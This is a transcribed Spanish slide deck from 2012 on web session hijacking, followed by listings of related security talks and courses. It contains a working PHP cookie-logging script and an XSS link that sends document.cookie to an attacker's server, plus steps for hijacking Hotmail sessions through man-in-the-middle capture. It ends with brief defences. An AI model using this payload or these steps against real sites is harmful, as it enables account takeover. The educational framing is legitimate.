Session Hijacking. Session Hijacking: Secuestro y robo de sesiones de aplicaciones web Parte II. Omar Palomino

Tamaño: px
Comenzar la demostración a partir de la página:

Download "Session Hijacking. Session Hijacking: Secuestro y robo de sesiones de aplicaciones web Parte II. Omar Palomino"

Transcripción

1 Session Hijacking Session Hijacking: Secuestro y robo de aplicaciones web Parte II Abril, 2012 Omar Palomino omarc320@gmail.com opalomino@kunak.com.pe

2 Ing. Sistemas y Maestrista de Ing. de Computación y Sistemas, CEH, Security+, ITIL v3. Consultor en seguridad de información de KUNAK Consulting. Psicólogo que aun no comienza sus estudios. Escritor en mis tiempos libres:

3 AVISO Y CONSIDERACIONES LEGALES Las técnicas mostradas en la presentación tienen por objetivo CONOCER las técnicas utilizadas por los hackers para robar y secuestrar aplicaciones web. La presentación NO TIENE POR OBJETIVO enseñar técnicas para realizar ataques contra aplicaciones web que son penados según la legislación de los países. El autor no se hace responsable del mal uso de las técnicas mostradas en la presentación.

4 Funcionamiento 1 El usuario ha ingresado normalmente a una aplicación web comercial o corporativo, como: Hotmail Facebook Aplicaciones web particulares (corporativos) 2 Importante: El usuario (la víctima) no se entera que su sesión de aplicación web ha sido vulnerada. El atacante encuentra un mecanismo para averiguar el identificador de SESIÓN y realizar el secuestro de la sesión del usuario.

5 Funcionamiento: Cross Site Scripting 2 1. Un usuario normal ingresa a la App. Web y ejecuta el código Javascript. 2. El código Javascript envía el código de Sesión al servidor web externo. 1 Importante: Un usuario perspicaz puede darse cuenta de la inserción de código malicioso en la página web. 1. El usuario malicioso prepara un servidor web externo para almacenar las. 2. El usuarios malicioso coloca código JavaScript sobre la App. Web Vulnerable. 5

6 Funcionamiento: Cross Site Scripting <?php $session = $_GET["cookie"]; $date = date("l ds of F Y h:i:s A"); $user_agent = $_SERVER['HTTP_USER_AGENT']; $file = fopen('log.txt','a'); fwrite($file, "DATE: $date USER AGENT: $user_agent COOKIE: $session \n"); fclose($file); header("location: 1 Importante: Un usuario perspicaz puede darse cuenta de la inserción de código malicioso en la página web. <a href="#" onclick=document.location=" /steal.php?cookie="+escape(doc ument.cookie);>ver aqui los detalles</a> 6

7 Por qué sucede esto? 1 Cuando el usuario ingresa a una página web: 1. Se crea una sesión aleatoria en el servidor web, esta sesión se almacena en una cookie o en una sesión. 2. Esta cookie viaja por la web cada vez que el cliente navega por la aplicación. La cookie contiene un identificador de sesión. Esto sucede porque: La transmisión de la sesión viaja en texto plano. Algoritmo débil de ID de sesión ( predecibles o muy pequeñas). Incorrecta configuración del bloqueo de. Sesiones que nunca expiran El atacante realiza un ataque para conseguir la sesión del usuario: Hombre en el medio (Man in the middle MiTM) Predecir el identificador de sesión (Predict Session) Cross site scripting (XSS) Otros de menos probabilidad 2. El atacante modifica la cookie e ingresa a la aplicación web con el contenido restringido de la víctima.

8 Vamos a la práctica Aplicación web PHP : 1. Capturamos la sesión mediante la técnica de hombre en el medio. 2. Identificamos la cookie y el número de sesión. 3. Modificamos la cookie mediante una herramienta: Advanced Cookie Manager. 4. Accedemos a la aplicación sin usuario ni contraseña. Aplicaciones web en internet (HOTMAIL): 1. Capturamos la sesión mediante la técnica de hombre en el medio. 2. Identificamos la cookie: RPSTAuth 3. Modificamos la cookie mediante una herramienta: Advanced Cookie Manager. 4. Accedemos a la aplicación sin usuario ni contraseña.

9 Cookies de aplicaciones web conocidas Cómo averiguo cuál es la COOKIE que me interesa? Entra a la aplicación web e identifica cookie por cookie cual es la importante. Google te lo puede decir (ya antes alguien se ha preguntado lo mismo).

10 Debemos automatizar el ataque. Hamster y Ferret Ferret: Herramienta para formatear el archivo PCAP producto del sniffing. Hamster: Proxy que muestra las cookies formateadas por Ferret. que funcionan en Windows y Linux. Firesheep Plugin de Mozilla Firefox Automatiza de manera muy rápida el robo de. A la fecha (2012) el plugin está descontinuado. Greasemonkey Plugin de Mozilla Firefox Permite ingresar la cookie capturada mediante MITM

11 Cómo evitamos el Envío de a través de un canal encriptado (HTTPS) Generar el identificador de sesión después de un login exitoso Evitar vulnerabilidades de aplicaciones web: XSS y correcta finalización de.

12 Session Hijacking Session Hijacking: Secuestro y robo de aplicaciones web Abril, 2012 Omar Palomino omarc320@gmail.com opalomino@kunak.com.pe

Session Hijacking. Session Hijacking: Secuestro y robo de sesiones de aplicaciones web. Omar Palomino.

Session Hijacking. Session Hijacking: Secuestro y robo de sesiones de aplicaciones web. Omar Palomino. Session Hijacking Session Hijacking: Secuestro y robo de de aplicaciones web Abril, 2012 Omar Palomino omarc320@gmail.com opalomino@kunak.com.pe Ing. Sistemas y Maestrista de Ing. de Computación y Sistemas,

Más detalles

Session Hijacking: Secuestro de sesiones en aplicaciones web empresariales

Session Hijacking: Secuestro de sesiones en aplicaciones web empresariales Session Hijacking: en aplicaciones web empresariales OWASP LATAM TOUR 2012 OMAR PALOMINO HUAMANÍ KUNAK CONSULTING SAC omarc320@gmail.com opalomino@kunak.com.pe Telef: 973861650 http://www.el-palomo.com

Más detalles

Analizando Skype Forense

Analizando Skype Forense Analizando Forense SKYPE FORENSIC: Analizando un caso real Julio, 2012 Omar Palomino omarc320@gmail.com Ing. Sistemas y Maestrista de Ing. de Computación y Sistemas, CEHv7, Security+, ITIL v3. Consultor

Más detalles

Anonimato en la web. Anonimato en la web: Proyecto TOR + SQLMap. Omar Palomino. omarc320@gmail.com. http://www.el-palomo.com.

Anonimato en la web. Anonimato en la web: Proyecto TOR + SQLMap. Omar Palomino. omarc320@gmail.com. http://www.el-palomo.com. Anonimato en la web Anonimato en la web: Proyecto TOR + SQLMap Abril, 2012 Omar Palomino omarc320@gmail.com Ing. Sistemas y Maestrista de Ing. de Computación y Sistemas, CEH, Security+, ITIL v3. Consultor

Más detalles

Las cookies son utilizadas habitualmente por los servidores web para diferenciar usuarios y para actuar de diferente forma dependiendo de éstos.

Las cookies son utilizadas habitualmente por los servidores web para diferenciar usuarios y para actuar de diferente forma dependiendo de éstos. Concepto de Cookie Una cookie (o galleta informática) es una pequeña información enviada por un sitio web y almacenado en el navegador del usuario, de manera que el sitio web puede consultar la actividad

Más detalles

SEGURIDAD Y ALTA DISPONIBILIDAD

SEGURIDAD Y ALTA DISPONIBILIDAD SEGURIDAD Y ALTA DISPONIBILIDAD 1 Nombre: Existen diferentes vulnerabilidades que, dependiendo de sus características, las podemos clasificar e identificar en los siguientes tipos: De configuración: Si

Más detalles

Ataques XSS en Aplicaciones Web

Ataques XSS en Aplicaciones Web Ataques XSS en Aplicaciones Web Education Project Antonio Rodríguez Romero Consultor de Seguridad Grupo isoluciones antonio.rodriguez@isoluciones.es Copyright 2007 The Foundation Permission is granted

Más detalles

ANÁLISIS DE LAS PRINCIPALES VULNERABILIDADES DE UN SISTEMA INFORMÁTICO

ANÁLISIS DE LAS PRINCIPALES VULNERABILIDADES DE UN SISTEMA INFORMÁTICO ANÁLISIS DE LAS PRINCIPALES VULNERABILIDADES DE UN SISTEMA INFORMÁTICO Luis Villalta Márquez INTRODUCCIÓN Existen diferentes vulnerabilidades que, dependiendo de sus características, las podemos clasificar

Más detalles

Webinar Gratuito Vulnerabilidades en Aplicaciones Web

Webinar Gratuito Vulnerabilidades en Aplicaciones Web Webinar Gratuito Vulnerabilidades en Aplicaciones Web Alonso Eduardo Caballero Quezada Consultor en Hacking Ético, Cómputo Forense & GNU/Linux Sitio Web: http://www.reydes.com e-mail: ReYDeS@gmail.com

Más detalles

Seguridad Web: SQL Injection & XSS

Seguridad Web: SQL Injection & XSS Seguridad Web: SQL Injection & XSS Programa de Estudio Seguridad Web: SQL Injection & XSS Aprende las técnicas más utilizadas por los hackers para vulnerar aplicaciones web y cómo utilizarlas para analizar

Más detalles

Seguridad Web: SQL Injection & XSS

Seguridad Web: SQL Injection & XSS Seguridad Web: SQL Injection & XSS Programa de Estudio Seguridad Web: SQL Injection & XSS Aprende las técnicas más utilizadas por los hackers para vulnerar aplicaciones web y cómo utilizarlas para analizar

Más detalles

Desarrollo de aplicaciones seguras. (Técnicas de ataque y defensa)

Desarrollo de aplicaciones seguras. (Técnicas de ataque y defensa) Desarrollo de aplicaciones seguras. (Técnicas de ataque y defensa) Jose Manuel Cejudo Gausi jmcejudo@multitrain.es Contenido La seguridad de aplicaciones. Atacando. Defendiendo. Presentación. MultiTrain

Más detalles

Seguridad Web. Álvaro Gómez Giménez UAM.NET. Álvaro Gómez Giménez (UAM.NET) Seguridad Web / 19

Seguridad Web. Álvaro Gómez Giménez UAM.NET. Álvaro Gómez Giménez (UAM.NET) Seguridad Web / 19 Seguridad Web Álvaro Gómez Giménez UAM.NET 10-04-2012 Álvaro Gómez Giménez (UAM.NET) Seguridad Web 10-04-2012 1 / 19 Contenidos 1 Introducción y planicación 2 SQL Injection y BSQLi 3 Cross-Site Scripting

Más detalles

Seguridad Informática: Técnicas hacker

Seguridad Informática: Técnicas hacker Seguridad Informática: Técnicas hacker Jesús Moreno León j.morenol@gmail.com Septiembre 2010 Estas diapositias son una obra derivada de los seminarios de formación impartidos por por Marta Beltrán y Antonio

Más detalles

MASTER HACKING Mobile Devices

MASTER HACKING Mobile Devices CURSO MASTER HACKING Mobile Devices Exclusivo de Villacorp & Asociados Domine su dispositivo móvil para proteger su entorno familiar o de negocios. 2 El primer y único curso de seguridad avanzada con dispositivos

Más detalles

Recomendaciones sobre protección de Dominios en Internet. Julio César Cossío NIC México.

Recomendaciones sobre protección de Dominios en Internet. Julio César Cossío NIC México. Recomendaciones sobre protección de Dominios en Internet Julio César Cossío NIC México. Julio.cossio@nic.mx Seguridad en Dominios Idea Regulación Registro Dominios Aplicaciones DNS Protege tu Idea Una

Más detalles

Cross Site Scripting. Conceptos Básicos y Casos prácticos. Antonio González Castro www.noveria.es antonio@noveria.es

Cross Site Scripting. Conceptos Básicos y Casos prácticos. Antonio González Castro www.noveria.es antonio@noveria.es Cross Site Scripting Conceptos Básicos y Casos prácticos Antonio González Castro www.noveria.es antonio@noveria.es # Definición Cross Site Scripting o también conocido como XSS por sus siglas en inglés,

Más detalles

Diplomado CiberSeguridad defensa y ataque de un ecosistema tecnológico.

Diplomado CiberSeguridad defensa y ataque de un ecosistema tecnológico. Diplomado CiberSeguridad defensa y ataque de un ecosistema tecnológico. TPX MX SA DE CV. Diplomado Presencial. Edición 1, Año 2017. https://tpx.mx/diplomados/ hola@tpx.mx tpx.mx @tpx_mx tpx.mx CiberSeguridad

Más detalles

AGENDA. Introducción al Ethical Hacking. Ethical Hacking vs Pentesting. Escaneo de red organizacional. Análisis de Vulnerabilidades

AGENDA. Introducción al Ethical Hacking. Ethical Hacking vs Pentesting. Escaneo de red organizacional. Análisis de Vulnerabilidades OMARC320@GMAIL.COM AGENDA 1 Acerca del autor 2 Introducción al Ethical Hacking 3 Ethical Hacking vs Pentesting 4 Escaneo de red organizacional 5 Análisis de Vulnerabilidades 6 Explotación de Vulnerabilidades

Más detalles

Desarrollo Seguro. Programa de Estudio.

Desarrollo Seguro. Programa de Estudio. Desarrollo Seguro Programa de Estudio Desarrollo Seguro Sabías que una gran cantidad de delitos informáticos se debe a errores de programación? Aprende a desarrollar aplicaciones de forma segura, siguiendo

Más detalles

http://www.soulblack.com.ar Security Research XSS CROSS SITE SCRIPTING Chebyte chebyte at gmail.com

http://www.soulblack.com.ar Security Research XSS CROSS SITE SCRIPTING Chebyte chebyte at gmail.com XSS CROSS SITE SCRIPTING Chebyte chebyte at gmail.com Conceptos XSS: (Cross Site Scripting) tipo de vulnerabilidad surgida como consecuencia de errores de filtrado de las entradas del usuario en aplicaciones

Más detalles

Vulnerabilidades en Aplicaciones Web Webinar Gratuito

Vulnerabilidades en Aplicaciones Web Webinar Gratuito Vulnerabilidades en Aplicaciones Web Webinar Gratuito Alonso Eduardo Caballero Quezada Consultor en Hacking Ético, Informática Forense & GNU/Linux Sitio Web: http://www.reydes.com e-mail: ReYDeS@gmail.com

Más detalles

Javier Garson Desarrollador web Abril CSRF Falsificando peticiones

Javier Garson Desarrollador web Abril CSRF Falsificando peticiones Javier Garson Desarrollador web Abril 2016 CSRF Falsificando peticiones Acerca de mi Javier Garson Aparicio Desarrollador web 4 años de experiencia en desarrollo web 2 años de experiencia haciendo pruebas

Más detalles

12/2016. Cambia tus contraseñas a menudo. Google soluciona 74 vulnerabilidades en Android. Mozilla publica actualizaciones para Firefox y Firefox ESR

12/2016. Cambia tus contraseñas a menudo. Google soluciona 74 vulnerabilidades en Android. Mozilla publica actualizaciones para Firefox y Firefox ESR Google soluciona 74 vulnerabilidades en Android Google ha publicado el boletín de seguridad Android en el que corrige un total de 74 vulnerabilidades, 11 de ellas calificadas como críticas. Mozilla publica

Más detalles

Amenazas a Aplicaciones Web Ing. Mauricio Andrade Guzmán. Subdirección de Seguridad de la Información/UNAM-CERT

Amenazas a Aplicaciones Web Ing. Mauricio Andrade Guzmán. Subdirección de Seguridad de la Información/UNAM-CERT Amenazas a Aplicaciones Web Ing. Mauricio Andrade Guzmán Subdirección de Seguridad de la Información/UNAM-CERT Agenda Aplicaciones web Principales amenazas Prevención y buenas prácticas Demo Aplicación

Más detalles

PRUEBAS DE PENETRACIÓN EN AMBIENTES DE NUBE. Ing. Javier Hernández Calderón Consultor en Seguridad Informática

PRUEBAS DE PENETRACIÓN EN AMBIENTES DE NUBE. Ing. Javier Hernández Calderón Consultor en Seguridad Informática PRUEBAS DE PENETRACIÓN EN AMBIENTES DE NUBE Ing. Javier Hernández Calderón Consultor en Seguridad Informática Que es la nube de internet? Dónde están las aplicaciones y mis datos? Acceso, desde cualquier

Más detalles

LOS 7 PECADOS DEL DESARROLO WEB & TENTACIÓN DEL USUARIOS EN APLICACIONES MOVILES. www.owasp.org

LOS 7 PECADOS DEL DESARROLO WEB & TENTACIÓN DEL USUARIOS EN APLICACIONES MOVILES. www.owasp.org LOS 7 PECADOS DEL DESARROLO WEB & TENTACIÓN DEL USUARIOS EN APLICACIONES MOVILES www.owasp.org Quien soy? Ing. Elvin Vidal Mollinedo Mencia Profesional de seguridad + 9 años de experiencia en desarrollo

Más detalles

SEGURIDAD EN APLICACIONES WEB. Autor: Siler Amador Donado

SEGURIDAD EN APLICACIONES WEB. Autor: Siler Amador Donado SEGURIDAD EN APLICACIONES WEB samador@unicauca.edu.co AGENDA 1.Autenticación y autorización de usuarios. 2.Autenticación por Sistema Operativo y por formulario. 3.Proporcionando Comunicaciones Seguras.

Más detalles

Backdoors en Sistemas Operativos. Instalación, configuración y uso de Backdoors

Backdoors en Sistemas Operativos. Instalación, configuración y uso de Backdoors Backdoors en Sistemas Operativos Instalación, configuración y uso de Backdoors AGENDA 1. Quién soy? 2. Casos de Seguridad Informática en el Perú y el mundo 3. Buscando vulnerabilidades backdoors 4. Qué

Más detalles

PRIMEROS PASOS EN LA APLICACIÓN REA

PRIMEROS PASOS EN LA APLICACIÓN REA PRIMEROS PASOS EN LA APLICACIÓN REA INTRODUCCIÓN El objetivo de este documento es facilitar al usuario la utilización de los certificados y la firma electrónica en la aplicación REA, mediante la realización

Más detalles

Seguridad Ofensiva en WordPress

Seguridad Ofensiva en WordPress V WordPress Meetup Facultad de Ciencias del Trabajo Seguridad Ofensiva en WordPress EDUARDO SÁNCHEZ Readme.html Eduardo Sánchez (Profesor F.P.) Ingeniero Informático / Master Seguridad TIC Comunidades:

Más detalles

SERVICIOS COMPUTACIONALES PROGRESS

SERVICIOS COMPUTACIONALES PROGRESS Vulnerability Assessment & Penetration Testing Evaluación de Vulnerabilidades y Test de Penetración RESUMEN EJECUTIVO En mutuo acuerdo con el cliente y el director del area de TI, se realiza la evaluación

Más detalles

Desarrollo y servicios web

Desarrollo y servicios web Desarrollo y servicios web Luisa Fernanda Rincón Pérez 2014-2 Sesión 4. 2 Qué haremos hoy? 3 1. GET/POST 2. Cookies 3.Sesiones Herramientas análisis HTTP Firebug plug-in for Firefox A must have for Web

Más detalles

Implementación y análisis del protocolo HTTPS

Implementación y análisis del protocolo HTTPS Universidad Técnica Federico Santa María Semiracio de Redes de computadores ELO-323 Implementación y análisis del protocolo HTTPS Francisco Cid francisco.cidn@alumnos.usm.cl Vanessa Pulgar vanessa.pulgar@alumnos.usm.cl

Más detalles

MANUAL DE USUARIO. Versión: 3.5

MANUAL DE USUARIO. Versión: 3.5 MANUAL DE USUARIO DE NAVEGADORES PARA REALIZAR FIRMA ELECTRÓNICA EN APLICACIONES DE SEDE ELECTRÓNICA DEL SEPE Versión: 3.5 Tabla de Contenidos PÁG. 1. OBJETIVO... 4 2. REQUISITOS DE EQUIPO CLIENTE... 5

Más detalles

Seguridad en la entrega aplicaciones

Seguridad en la entrega aplicaciones Seguridad en la entrega Seguridad ende la entrega de aplicaciones Joaquin Malo de Molina BDM Security Enterprise Manuel García Rincón Country Manger Iberia mgrincon@kemptechnologies.com KEMP Technologies

Más detalles

Ingeniero Técnico en Informática - UCA Máster en Ingeniería del Software - US Máster en Seguridad de las TIC - US

Ingeniero Técnico en Informática - UCA Máster en Ingeniería del Software - US Máster en Seguridad de las TIC - US Sobre mi Formación Ingeniero Técnico en Informática - UCA Máster en Ingeniería del Software - US Máster en Seguridad de las TIC - US Experiencia Aficiones 4+ años como desarrollador web, más de 2 en Drupal

Más detalles

.com [IN]SEGURIDAD WEB ING. SAUL MAMANI M.

.com [IN]SEGURIDAD WEB ING. SAUL MAMANI M. .com [IN]SEGURIDAD WEB ING. SAUL MAMANI M. Sobre mi Fundamentos de las Aplicaciones Web: http https HTML 5, CSS 3, JavaScript Php C# Java Pyton SQL Server My SQL Oracle Postgresql Fundamentos de las

Más detalles

Adquiere las habilidades que el mundo está buscando

Adquiere las habilidades que el mundo está buscando Dirigido a: Todos los cursos previos al DurivaCON están orientado a profesionales de informática, estudiantes o entusiastas que desean aprender de la mano de expertos distintas herramientas de hacking,

Más detalles

DISCLAIMER Todo el contenido de esta charla es resultado de investigación con fines didácticos y educativos. El autor no se hace responsable por el uso del conocimiento contenido en la siguiente presentación.

Más detalles

Introducción a OWASP TOP Ten Segu-Info &

Introducción a OWASP TOP Ten Segu-Info & Introducción a OWASP TOP Ten 2017 Segu-Info & Quiénes somos? Cristian Borghello @seguinfo Maxi Soler @maxisoler Marcos García @artsweb Segu-Info & OWASP Open Web Application Security Project. Qué es OWASP?

Más detalles

AMENAZAS AVANZADAS Y PERSISTENTES

AMENAZAS AVANZADAS Y PERSISTENTES AMENAZAS AVANZADAS Y PERSISTENTES INDICE 1 INTRODUCCIÓN 2 CRONOLOGIA...2 ATACANTES...2 OBJETIVOS...2 FASES 2 RECONOCIMIENTO...2 ATAQUE INICIAL...2 RECOPILACIÓN DE INFORMACIÓN...2 ATAQUES POSTERIORES...2

Más detalles

Corporación Ornitorrinco Labs

Corporación Ornitorrinco Labs Preparación para OWASP Top 10-2016 Sebastián Quevedo 0rnitorrinco labs Sebastian@0rnitorrinco.cl Corporación Ornitorrinco Labs Somos una organización sin ánimo de lucro dedicada a la investigación en Ciencia,

Más detalles

Desarrollo seguro en Drupal. Ezequiel Vázquez De la calle

Desarrollo seguro en Drupal. Ezequiel Vázquez De la calle Sobre mi Estudios Ingeniero Técnico en Informática - UCA Máster en Ingeniería del Software - US Experto en Seguridad de las TIC - US Experiencia Aficiones 3+ años como desarrollador web, casi 2 en Drupal

Más detalles

Analista Consultor en Seguridad Informática IT: Ethical Hacking

Analista Consultor en Seguridad Informática IT: Ethical Hacking Analista Consultor en Seguridad Informática IT: Ethical Hacking TITULACIÓN DE FORMACIÓN CONTINUA BONIFICADA EXPEDIDA POR EL INSTITUTO EUROPEO DE ESTUDIOS EMPRESARIALES Analista Consultor en Seguridad Informática

Más detalles

Resolución de incidencias para el applet de @firma. Versión 1.0

Resolución de incidencias para el applet de @firma. Versión 1.0 Resolución de incidencias para el applet de @firma Versión 1.0 Control Versión 1.0 Fecha: 10-06-2014 Modificaciones: Primera versión 1 Introducción 4 2 Requisitos mínimos 4 2.1 Entorno de ejecución de

Más detalles

Hacking Ético Web. I Jornadas Tecnológicas CEEPS 27-03-2012 Carlos García García i52gagac@uco.es ciyinet@gmail.com. @ciyinet

Hacking Ético Web. I Jornadas Tecnológicas CEEPS 27-03-2012 Carlos García García i52gagac@uco.es ciyinet@gmail.com. @ciyinet Hacking Ético Web I Jornadas Tecnológicas CEEPS 27-03-2012 Carlos García García i52gagac@uco.es ciyinet@gmail.com @ciyinet Índice Introducción OWASP OWASP Top 10 (2010) Demostración ataques Inyección SQL

Más detalles

Curso de Consultor en Seguridad Informática IT: Ethical Hacking (Titulación Universitaria con 4 Créditos ECTS)

Curso de Consultor en Seguridad Informática IT: Ethical Hacking (Titulación Universitaria con 4 Créditos ECTS) Curso de Consultor en Seguridad Informática IT: Ethical Hacking (Titulación Universitaria con 4 titulación de formación continua bonificada expedida por el instituto europeo de estudios empresariales Curso

Más detalles

Introducción a OWASP OWASP. The OWASP Foundation http://www.owasp.org

Introducción a OWASP OWASP. The OWASP Foundation http://www.owasp.org Introducción a Ing. Camilo Fernandez Consultor en Seguridad Informática Octubre, 2010 cfernandez@develsecurity.com Copyright 2004 - The Foundation Permission is granted to copy, distribute and/or modify

Más detalles

PARTE 1. XSS indirecto

PARTE 1. XSS indirecto PRÁCTICA No. 3: XSS - Secuencias de Comandos en Sitios Cruzados A. Objetivo de aprendizaje El alumno comprenderá la importancia de corregir los defectos de programación mediante la práctica de la técnica

Más detalles

Ataques Web Automáticos: Identificación, Engaño y Contraataque

Ataques Web Automáticos: Identificación, Engaño y Contraataque Ataques Web Automáticos: Identificación, Engaño y Contraataque Mariano Nuñez Di Croce mnunez@cybsec cybsec.comcom Noviembre 2005 CIBSI 05 Valparaíso, Chile Agenda - Introducción a las Herramientas Automáticas.

Más detalles

Computación Web (Curso 2013/2014)

Computación Web (Curso 2013/2014) Seguridad en Aplicaciones Web (I) Computación Web (Curso 2013/2014) Jesús Arias Fisteus // jaf@it.uc3m.es Seguridad en Aplicaciones Web (I) p. 1 Seguridad en aplicaciones Web «This site is absolutely secure.

Más detalles

Durante el uso de nuestra página Web usted acepta y autoriza expresamente el uso de cookies, de acuerdo con nuestra Política de Privacidad.

Durante el uso de nuestra página Web usted acepta y autoriza expresamente el uso de cookies, de acuerdo con nuestra Política de Privacidad. POLÍTICA DE COOKIES RT comunica a los usuarios, a través de este aviso, que puede utilizar cookies cuando el usuario navega por las diferentes pantallas y páginas del sitio. Durante el uso de nuestra página

Más detalles

Conseguir información sobre los hábitos de navegación del usuario, entre otras.

Conseguir información sobre los hábitos de navegación del usuario, entre otras. INFORMACIÓN CORPORATIVA En relación a las Cookies durante la navegación Una cookie (o galleta informática) es una pequeña información enviada por un sitio web y almacenada en el navegador del usuario,

Más detalles

Manual Configuración equipos para Firma Electrónica IGAPE

Manual Configuración equipos para Firma Electrónica IGAPE Manual Configuración equipos para Firma Electrónica IGAPE NOVIEMBRE DE 2017 1. OBJETIVO El presente documento detalla los pasos a realizar por los usuarios de cara a la configuración adecuada de los navegadores

Más detalles

Navegadores. Los navegadores. Privacidad. Oscar Herrero INTERNET SEGURO CEIP ARCIPRESTE DE HITA. Fuente:OSI

Navegadores. Los navegadores. Privacidad. Oscar Herrero INTERNET SEGURO CEIP ARCIPRESTE DE HITA. Fuente:OSI Navegadores Para la mayoría de usuarios, la cara visible de la informática es Internet. Desde todo tipo de dispositivos (ordenadores, tabletas y smartphones) accedemos a la red en busca de información,

Más detalles

Cualidades de la seguridad de la información 59 Metodología para mejorar la seguridad de la información 61 Retos en la seguridad de la información 66

Cualidades de la seguridad de la información 59 Metodología para mejorar la seguridad de la información 61 Retos en la seguridad de la información 66 Índice Índice 1 Introducción 10 Para quién es este libro? 11 Estructura del libro 12 Cómo obtener ayuda 15 Fundamentos 15 Linux 16 Terminal de Linux 18 Instalando herramientas 23 Interfaz de red 26 Redes,

Más detalles

Webinar Gratuito OWASP WebScarab

Webinar Gratuito OWASP WebScarab Webinar Gratuito OWASP WebScarab Alonso Eduardo Caballero Quezada Consultor en Hacking Ético, Informática Forense & GNU/Linux Sitio Web: http://www.reydes.com e-mail: ReYDeS@gmail.com Jueves 30 de Enero

Más detalles

OVIA: Oficina Virtual de Impuestos Autonómicos

OVIA: Oficina Virtual de Impuestos Autonómicos OVIA: Oficina Virtual de Impuestos Autonómicos La Oficina Virtual de Impuestos Autonómicos (OVIA) permite realizar trámites de forma no presencial para presentar impuestos y modelos de la Junta de Castilla

Más detalles

Presentación del curso Presencial

Presentación del curso Presencial Presentación del curso Presencial Seguridad Informática y Hacking Ético Módulo II Tabla de contenido Presentación del curso... 3 Objetivos de aprendizaje... 4 Contenidos de cursos... 5 Competencias previas...

Más detalles

MANUAL DE INSTALACIÓN Y CONFIGURACIÓN DEL CLIENTE VoIP X-LITE

MANUAL DE INSTALACIÓN Y CONFIGURACIÓN DEL CLIENTE VoIP X-LITE MANUAL DE INSTALACIÓN Y CONFIGURACIÓN DEL CLIENTE VoIP X-LITE El siguiente instructivo le permite instalar el cliente VoIP que se necesita para hacer uso del servicio de telefonía IP que presta la División

Más detalles

Anexo IV Vulnerabilidades más críticas de los sistemas informáticos

Anexo IV Vulnerabilidades más críticas de los sistemas informáticos Anexo IV Vulnerabilidades más críticas de los sistemas informáticos Álvaro Gómez Vieites ANEXO IV VULNERABILIDADES MÁS CRÍTICAS DE LOS SISTEMAS INFORMÁTICOS LAS 20 VULNERABILIDADES MÁS CRÍTICAS SEGÚN

Más detalles

MINT A NIVEL BROSERW CON BEEF

MINT A NIVEL BROSERW CON BEEF MINT A NIVEL BROSERW CON BEEF Y METASPLOIT Como usuario seguimos con las mismavulnerabilidades 17 DE ABRIL DEL 2015 SANTA CRUZ BOLIVIA WALTER CAMAMA MENACHO About Me About Me - Ingeniero de sistemas Universidad

Más detalles

Informe presentación ELO-323 redes de computadores II

Informe presentación ELO-323 redes de computadores II Informe presentación ELO-323 redes de computadores II seguridad en las redes, ataques comunes y pruebas de conceptos Oscar Tapia Godoy 2830018-2 Introducción En este informe se presentarán las importancias

Más detalles

Informe de análisis de riesgo en servidores. Julio Realizado por: Trend Micro

Informe de análisis de riesgo en servidores. Julio Realizado por: Trend Micro Informe de análisis de riesgo en servidores Julio 2017 Realizado por: Trend Micro Contenido Resumen Ejecutivo... 3 Análisis Técnico... 5 Conclusiones... 8 Contactos Trend Micro... 9 2 Resumen Ejecutivo

Más detalles

Técnicas de Hacking Ético en un Laboratorio de Pentesting Virtualizado

Técnicas de Hacking Ético en un Laboratorio de Pentesting Virtualizado Técnicas de Hacking Ético en un Laboratorio de Pentesting Virtualizado Florentino Mendez Gijon Universidad de la Sierra Juárez fmendez@juppa.unsij.edu.mx Adrian Aquino Robles Universidad de la Sierra Juárez

Más detalles

LECCION-2. Por omitir las cosas triviales se comenten grandes errores. Cursos de Entrenamiento de Servidores Linux y Telefonía IP con Asterisk/Elastix

LECCION-2. Por omitir las cosas triviales se comenten grandes errores. Cursos de Entrenamiento de Servidores Linux y Telefonía IP con Asterisk/Elastix LECCION-2 CONFIGURACION DE APLICATIVOS DE ACCESO REMOTO En esta lección, aprenderemos como configurar los programas aplicativos para acceder remotamente al servidor Elastix desde la interfaz grafica Web

Más detalles

Auditoría Técnica de Seguridad de Aplicaciones Web

Auditoría Técnica de Seguridad de Aplicaciones Web Auditoría Técnica de Seguridad de Aplicaciones Web Esta obra está sujeta a una licencia de Reconocimiento-NoComercial-CompartirIgual 3.0 España de Creative Commons Estudiante: Isaac Peña Torres Consultor:

Más detalles

Por último hablaremos sobre los empleados poco seguros.

Por último hablaremos sobre los empleados poco seguros. En la portada de nuestro nuevo número Hablaremos sobre el problema del almacenamiento de contraseñas en texto plano por parte de Android. Ataque Anti-Sec a Apple Apple es el nuevo objetivo de los ataques

Más detalles

Cuáles son los navegadores de internet más seguros?

Cuáles son los navegadores de internet más seguros? Cuáles son los navegadores de internet más seguros? Al tener que usar para casi todo un navegador de internet, debemos asegurarnos que sean muy seguros, por esta razón es que debemos cerciorarnos de que

Más detalles

INTRAMEDER SL comunica a los usuarios, a través de este aviso, que puede utilizar cookies cuando el usuario navega por las diferentes pantallas y

INTRAMEDER SL comunica a los usuarios, a través de este aviso, que puede utilizar cookies cuando el usuario navega por las diferentes pantallas y POLÍTICA DE COOKIES INTRAMEDER SL comunica a los usuarios, a través de este aviso, que puede utilizar cookies cuando el usuario navega por las diferentes pantallas y páginas del sitio. Durante el uso de

Más detalles

Búsqueda de vulnerabilidades - Análisis. 22 o Escuela de Verano de Ciencias Informáticas RIO 2015

Búsqueda de vulnerabilidades - Análisis. 22 o Escuela de Verano de Ciencias Informáticas RIO 2015 Búsqueda de vulnerabilidades - Análisis dinámico Juan Heguiabehere Joaquín Rinaudo 22 o Escuela de Verano de Ciencias Informáticas RIO 2015 Sobre el curso Lunes: Android como plataforma de desarrollo -

Más detalles

Implementación de ModSecurity Firewall de Aplicación Web L.I. Dante Odín Ramírez López

Implementación de ModSecurity Firewall de Aplicación Web L.I. Dante Odín Ramírez López Implementación de ModSecurity Firewall de Aplicación Web L.I. Dante Odín Ramírez López Subdirección de Seguridad de la Información UNAM-CERT Por qué las aplicaciones web son inseguras? Su desarrollo es

Más detalles

CrossFire: complementos de Firefox pueden ser explotados malicionamente

CrossFire: complementos de Firefox pueden ser explotados malicionamente CrossFire: complementos de Firefox pueden ser explotados malicionamente Expertos en seguridad dieron a conocer durante una conferencia en un Black Hat (hacker de sombrero negro), celebrado en Singapur,que

Más detalles

AMECI Asociación Mexicana de Ciberseguridad. Pentesting aplicaciones WEB Versión 2018-V2.0 AM-PTW Modalidad: e-learning Ficha Técnica

